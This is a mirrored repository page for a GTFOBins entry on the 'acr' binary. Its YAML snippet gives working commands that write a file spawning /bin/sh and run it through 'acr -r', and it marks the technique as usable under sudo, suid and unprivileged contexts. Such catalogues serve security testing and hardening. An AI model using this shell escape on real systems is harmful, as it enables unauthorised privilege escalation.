1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-08 06:56:15 +01:00
GTFOBins.github.io/_gtfobins/acr
2026-01-17 10:52:51 +01:00

14 lines
257 B
Plaintext

---
functions:
command:
- code: |-
echo -e 'x:\n\t/bin/sh 1>&0 2>&0' >/path/to/temp-file
chmod +x /path/to/temp-file
acr -r ./relative/path/to/temp-file
contexts:
sudo:
suid:
shell: true
unprivileged:
...